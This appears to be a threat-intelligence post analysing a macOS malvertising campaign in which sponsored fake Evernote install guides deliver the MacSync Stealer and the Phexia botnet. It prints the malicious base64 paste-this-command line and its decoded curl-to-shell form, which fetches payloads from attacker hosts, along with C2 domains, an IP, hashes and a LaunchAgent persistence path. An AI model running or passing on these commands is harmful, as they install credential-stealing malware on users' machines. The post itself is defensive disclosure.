Hunting for MacOS malware๐with
@osint_barbie revealed how threat actors are now leveraging different malware solutions at the same time on the same payload, in this case, MacSync Stealer Phexia Botnet for persistence
Malicious
@evernote results with fake installations guides are being sponsored on Google for common searches like homebrew leading the user to copy paste and run a malicious command (image 1)
lite.evernote[.]com/note/c548d6e8-22e3-d45c-b0d2-2ac5ecbd8964
Like usual, payload is base64 encoded
echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJzsgY3VybCAta2ZzU0wgaHR0cDovL29udGFyaW9xdWFsaXR5Y2VkYXIuY29tL2N1cmwvYTBlZDBiZjg4MTY0YjA5NTYwZjM1ODQ2MjI3MWM2YTZlNzFkMjYxMWRiNjNkODVlYmFhZTkwYjI0OWJlOWYyOCB8IHpzaDsgY3VybCAta2ZzU0wgaHR0cDovLzEzOC4xMjQuMTguOS92IHwgYmFzaA==' | base64 -D | zsh
decoded
curl -kfsSL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 | zsh; curl -kfsSL http://138.124.18.9/v
and we can already observe the two different malware solutions being leveraged
1. MacSync Stealer
As it is usual, URL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 will provide a bash script with a b64 gunzip encoding, in charge of fetching infostealer applescript, executing it and uploading victim log to C2 (image 2)
There is not really much newer on this as what is seen before, just that now MacSync scripts uploads the log by splitting the file in 10mb chunks, probably to avoid data loses in big sized logs
MacSync bash Script -> f5a3fcc5f5d4754d7262f55ac0a4519af15f93bba847e986a1660820bad1caef
2. Phexia Botnet
Interesting part of this post is that a second payload is being executed sequentially as part of a different malware solution to create persistence on the MacOS infected machine
From C2 138.124.18.9/v , a b64-encoded apple script is fetched. In this case, it creates LaunchAgent persistence using a plist in ~/Library/LaunchAgents/com.bashsrc.ixxjeiijvivzovon.plist with a b64 applescript content
This second payload, nothing far from what is has been seen before, is the responsible to fetch a Phexia Botnet live C2 from t[.]me/phefuckxiabot or if failed, harcoded values (kys[.]cx and kys[.]li), grab and execute Phexia Botnet applescript, which manages to grab specs from the machine and waits until a task is loaded to be executed in the infected machine (image 3)
Phexia AppleScript -> 618bff4f4d090ff802d8009dc97a89723757bd179e5cab069fb33c5ec7de61c2
Sponsored results are being paid by different, likely compromised, advertisers (image 4)
Transparency users - AR01249564419160014849, AR13446608053252128769, AR06288543453827563521, AR03671228110637891585
By analysing the advertisers, you can already see other active ads sponsoring other malicious Evernote results for MacOS applications or fake command solutions for Transmission, OnyX, Rectangle, Final Cut Pro, PearCleaner, DropOver, 7zip, Flush DNS, NFTS, AppCleaner, OBS, CrossOver, Unarchiver, Open Source Office, Microsoft Office or VLC Player, among others.